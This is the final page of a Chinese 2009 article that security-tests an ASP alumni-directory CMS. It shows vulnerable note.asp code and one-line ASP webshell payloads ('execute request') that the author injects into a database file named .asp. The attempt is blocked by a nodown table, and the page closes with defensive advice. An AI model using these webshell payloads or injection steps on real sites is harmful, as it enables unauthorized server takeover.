WEB开发网
开发学院网络安全安全技术 不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测... 阅读

不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测

 2009-01-05 13:50:06 来源:WEB开发网   
核心提示: 图22说明:此方法会造成网站无法正常浏览,在上传大马后,不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测(10),应及时恢复原配置文件siteinfo.asp,五、直接拿webshell 本来这是在最前面测试的,个人认为在选 择CMS时,选择一些成熟的CMS产品安全性会高些,但由于各

图22

说明:

此方法会造成网站无法正常浏览,在上传大马后,应及时恢复原配置文件siteinfo.asp。

五、直接拿webshell

本来这是在最前面测试的,但由于各种原因,我把它放最后。数据库是以asp文件存在,如果使用者没更改默认数据 库文件,那么就在可以输入的地方往数据库内插入一句话木马,直接得到webshell。于是查找所有文件中包含 “request.form”的文件,最后在note.asp文件中发现,程序未对客户输入的内容做任何过滤,可以把一句话木马直接 插入数据库内。

if request("type2")="add" then

rs.open "select * from note1 where userid="&session("xyluserid")&"",conn,1,3

If Rs.eof Then

rs.addnew

response.write "添加成功"

rs("userid")=session("xyluserid")

end if

rs("content")=request.form("content")

rs.update

rs.close

response.write "修改成功"

end if

于是尝试在往数据库 中插入:“%><%execute request("n")%><%”“%><%execute request("n")%>”等多种一句话的 Unicode字符,再访问数据库文件,都显示,无法闭合,如图23所示。

不懂ASP也照样挖漏洞 记一次<a target=CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图23

原因是数据库中存在nodown表,做了防下载处理,不过应该可以突破,但本人能力有限,未能进一步突破。

安全小知识:如何建立nodown防下载表?

首先,用notepad新建一个内容为“<%”的文本文件,随便起个名字 存档。

接着,用Access打开您的数据库文件,在最后新建一个表,随便起个名字,在表中添加一个OLE对象的字段, 然后添加一个记录,插入之前建立的文本文件,如果操作正确的话,应该可以看到一个新的名为“数据包”的记录。

六、总结

由于本人不懂ASP,能力有限,所以此次检测并没有太深入,还有一些XSS跨站攻击和上传等也未进行测试,总体来说 ,这套CMS的安全性还是可以的,如果管理员密码设置复杂一些,登录不了后台,那也无法拿到webshell。个人认为在选 择CMS时,选择一些成熟的CMS产品安全性会高些,同时也应该把数据库文件和配置文件的名称改复杂一些。

上一页  5 6 7 8 9 10 

Tags:ASP 照样 漏洞

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接